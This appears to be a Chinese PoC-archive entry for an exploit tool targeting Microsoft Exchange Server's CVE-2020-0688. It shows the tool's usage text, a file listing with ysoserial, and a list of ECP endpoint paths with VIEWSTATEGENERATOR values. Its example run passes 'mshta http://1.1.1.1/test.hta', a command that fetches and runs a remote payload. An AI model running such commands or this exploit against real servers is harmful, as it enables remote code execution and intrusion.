漏洞平台

POC详情： c2068dc84c3ca17c10fb13446b0cf3202e204d2f

来源

https://github.com/Yt1g3r/CVE-2020-0688_EXP

关联漏洞

标题： Microsoft Exchange Server 授权问题漏洞 (CVE-2020-0688)
描述：Microsoft Exchange Server是美国微软（Microsoft）公司的一套电子邮件服务程序。它提供邮件存取、储存、转发，语音邮件，邮件过滤筛选等功能。 Microsoft Exchange Server 中存在授权问题漏洞，该漏洞源于程序无法正确处理内存中的对象。攻击者可借助特制的电子邮件利用该漏洞在系统用户的上下文中运行任意代码。以下产品及版本受到影响：Microsoft Exchange Server 2010，Microsoft Exchange Server 2013，Micro

描述

CVE-2020-0688_EXP Auto trigger payload & encrypt method

介绍

# CVE-2020-0688_EXP
CVE-2020-0688_EXP Auto trigger payload

```
python3 CVE-2020-0688_EXP.py -h  

usage: CVE-2020-0688_EXP.py [-h] -s SERVER -u USER -p PASSWORD -c CMD [-e]  

optional arguments:  
  -h, --help            show this help message and exit  
  -s SERVER, --server ECP Server URL Example: http://ip/owa  
  -u USER, --user USER  login account Example: domain\user  
  -p PASSWORD, --password PASSWORD  
  -c CMD, --cmd CMD     Command u want to execute  
  -e, --encrypt         Encrypt the payload  
```

example:
```
python CVE-2020-0688_EXP.py -s https://mail.x.com/ -u user@x.com -p passwd -c "mshta http://1.1.1.1/test.hta"
```

Other available paths:
```
/ecp/default.aspx?__VIEWSTATEGENERATOR=B97B4E27
/ecp/PersonalSettings/HomePage.aspx?showhelp=false&__VIEWSTATEGENERATOR=1D01FD4E
/ecp/PersonalSettings/HomePage.aspx?showhelp=false&__VIEWSTATEGENERATOR=1D01FD4E
/ecp/Organize/AutomaticReplies.slab?showhelp=false&__VIEWSTATEGENERATOR=FD338EE0
/ecp/RulesEditor/InboxRules.slab?showhelp=false&__VIEWSTATEGENERATOR=FD338EE0
/ecp/Organize/DeliveryReports.slab?showhelp=false&__VIEWSTATEGENERATOR=FD338EE0
/ecp/MyGroups/PersonalGroups.aspx?showhelp=false&__VIEWSTATEGENERATOR=A767F62B
/ecp/MyGroups/ViewDistributionGroup.aspx?pwmcid=1&id=38f4bec5-704f-4272-a654-95d53150e2ae&ReturnObjectType=1&__VIEWSTATEGENERATOR=321473B8
/ecp/Customize/Messaging.aspx?showhelp=false&__VIEWSTATEGENERATOR=9C5731F0
/ecp/Customize/General.aspx?showhelp=false&__VIEWSTATEGENERATOR=72B13321
/ecp/Customize/Calendar.aspx?showhelp=false&__VIEWSTATEGENERATOR=4AD51055
/ecp/Customize/SentItems.aspx?showhelp=false& __VIEWSTATEGENERATOR=4466B13F
/ecp/PersonalSettings/Password.aspx?showhelp=false&__VIEWSTATEGENERATOR=59543DCA
/ecp/SMS/TextMessaging.slab?showhelp=false&__VIEWSTATEGENERATOR=FD338EE0
/ecp/TroubleShooting/MobileDevices.slab?showhelp=false&__VIEWSTATEGENERATOR=FD338EE0
/ecp/Customize/Regional.aspx?showhelp=false&__VIEWSTATEGENERATOR=9097CD08
/ecp/MyGroups/SearchAllGroups.slab?pwmcid=3&ReturnObjectType=1__VIEWSTATEGENERATOR=FD338EE0
/ecp/Security/BlockOrAllow.aspx?showhelp=false&__VIEWSTATEGENERATOR=362253EF
```

文件快照


 [4.0K]  /data/pocs/c2068dc84c3ca17c10fb13446b0cf3202e204d2f
├── [4.7K]  CVE-2020-0688_EXP.py
├── [2.1K]  README.md
└── [4.0K]  ysoserial-1.32
    ├── [ 44K]  fastjson.dll
    ├── [1.3M]  FSharp.Core.dll
    ├── [605K]  FSharp.Core.xml
    ├── [8.5K]  FsPickler.CSharp.dll
    ├── [ 14K]  FsPickler.CSharp.xml
    ├── [947K]  FsPickler.dll
    ├── [ 68K]  FsPickler.Json.dll
    ├── [6.0K]  FsPickler.Json.xml
    ├── [129K]  FsPickler.xml
    ├── [1.1M]  microsoft.identitymodel.dll
    ├── [1.3M]  Microsoft.PowerShell.Editor.dll
    ├── [ 22K]  NDesk.Options.dll
    ├── [638K]  Newtonsoft.Json.dll
    ├── [658K]  Newtonsoft.Json.xml
    ├── [5.7M]  System.Management.Automation.dll
    ├── [198K]  YamlDotNet.dll
    ├── [242K]  YamlDotNet.xml
    ├── [133K]  ysoserial.exe
    └── [ 540]  ysoserial.exe.config

1 directory, 21 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。